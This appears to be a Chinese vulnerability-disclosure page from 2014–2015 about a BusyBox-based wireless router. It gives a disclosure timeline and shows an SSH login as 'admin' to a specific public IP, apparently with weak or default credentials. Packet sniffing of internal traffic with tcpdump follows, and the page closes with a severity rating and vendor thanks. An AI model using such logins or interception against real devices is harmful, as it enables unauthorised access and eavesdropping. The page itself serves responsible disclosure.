2014-12-19: 细节已通知厂商并且等待厂商处理中 2014-12-20: 厂商已经确认,细节仅向厂商公开 2014-12-30: 细节向核心白帽子及相关领域专家公开 2015-01-09: 细节向普通白帽子公开 2015-01-19: 细节向实习白帽子公开 2015-02-02: 细节向公众公开
一天一发神器不停
ssh 218.4.236.171 -ladminadmin@218.4.236.171's password: \Permission denied, please try again.admin@218.4.236.171's password: BusyBox v1.4.2 (2010-10-29 15:41:19 CST) Built-in shell (ash)Enter 'help' for a list of built-in commands.________________________________________________________| W I R E L E S S F R E E D O M || link to the bussiness world ||_______________________________________________________|
可以内网抓各种数据包哟
root@Bizbox:/usr/bin# tcpdump -vv -i eth2.8 port 80tcpdump: listening on eth2.8, link-type EN10MB (Ethernet), capture size 96 bytes19:48:09.678568 IP (tos 0x10, ttl 64, id 47843, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.4179 > lhr14s24-in-f19.1e100.net.80: S, cksum 0xac00 (correct), 2941187251:2941187251(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.681456 IP (tos 0x10, ttl 64, id 5536, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3034 > 74.125.71.132.80: S, cksum 0xe83f (correct), 2942327755:2942327755(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.682418 IP (tos 0x10, ttl 64, id 31079, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3035 > 74.125.71.132.80: S, cksum 0x0d42 (correct), 2935306035:2935306035(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.682499 IP (tos 0x10, ttl 64, id 22308, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3036 > 74.125.71.132.80: S, cksum 0x2ab4 (correct), 2940213621:2940213621(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.684414 IP (tos 0x10, ttl 64, id 28272, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3938 > lhr14s24-in-f20.1e100.net.80: S, cksum 0x81d5 (correct), 2934317111:2934317111(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.685446 IP (tos 0x10, ttl 64, id 20195, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3039 > 74.125.71.132.80: S, cksum 0x4303 (correct), 2947023035:2947023035(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.686451 IP (tos 0x10, ttl 64, id 33732, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3040 > 74.125.71.132.80: S, cksum 0x75fe (correct), 2949500313:2949500313(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.687441 IP (tos 0x10, ttl 64, id 58189, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3041 > 74.125.71.132.80: S, cksum 0x96dd (correct), 2943331607:2943331607(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.688429 IP (tos 0x10, ttl 64, id 19467, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3042 > 74.125.71.132.80: S, cksum 0x416d (correct), 2946630228:2946630228(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.689467 IP (tos 0x10, ttl 64, id 14790, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3043 > 74.125.71.132.80: S, cksum 0xcca1 (correct), 2938533786:2938533786(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.691457 IP (tos 0x10, ttl 64, id 46284, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3045 > 74.125.71.132.80: S, cksum 0x4970 (correct), 2940598954:2940598954(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.692452 IP (tos 0x10, ttl 64, id 33094, offset 0, flags [DF], proto TCP (6), length 52) 218.4.236.170.3046 > 74.125.71.132.80: S, cksum 0x74bb (correct), 2944323365:2944323365(0) win 5840 <mss 1460,nop,nop,sackOK,nop,wscale 2>19:48:09.923007 IP (tos 0x0, ttl 63, id 13942, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59507 > 58.221.78.105.80: F, cksum 0x8185 (correct), 3574744803:3574744803(0) ack 1431276189 win 6392119:48:09.923542 IP (tos 0x0, ttl 63, id 13943, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59509 > 58.221.78.105.80: F, cksum 0x61e1 (correct), 136702353:136702353(0) ack 3383124320 win 6360819:48:09.923877 IP (tos 0x0, ttl 63, id 13944, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59508 > 58.221.78.105.80: F, cksum 0x1af1 (correct), 4103653662:4103653662(0) ack 1253202757 win 6360819:48:09.924189 IP (tos 0x0, ttl 63, id 13945, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59506 > 58.221.78.105.80: F, cksum 0x4e8a (correct), 3774842534:3774842534(0) ack 1363179331 win 6359019:48:09.924656 IP (tos 0x0, ttl 63, id 13946, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59510 > 58.221.78.105.80: F, cksum 0x83af (correct), 1524335358:1524335358(0) ack 2638249621 win 6392719:48:09.924977 IP (tos 0x0, ttl 63, id 13947, offset 0, flags [DF], proto TCP (6), length 40) 218.4.236.170.59511 > 58.221.78.105.80: F, cksum 0x1518 (correct), 1220988852:1220988852(0) ack 125519639 win 64240
危害等级:中
漏洞Rank:7
确认时间:2014-12-20 06:21
谢谢。
2015-01-29:谢谢。
2015-03-19:再次感谢"杀器王子"对我司安全建设的贡献!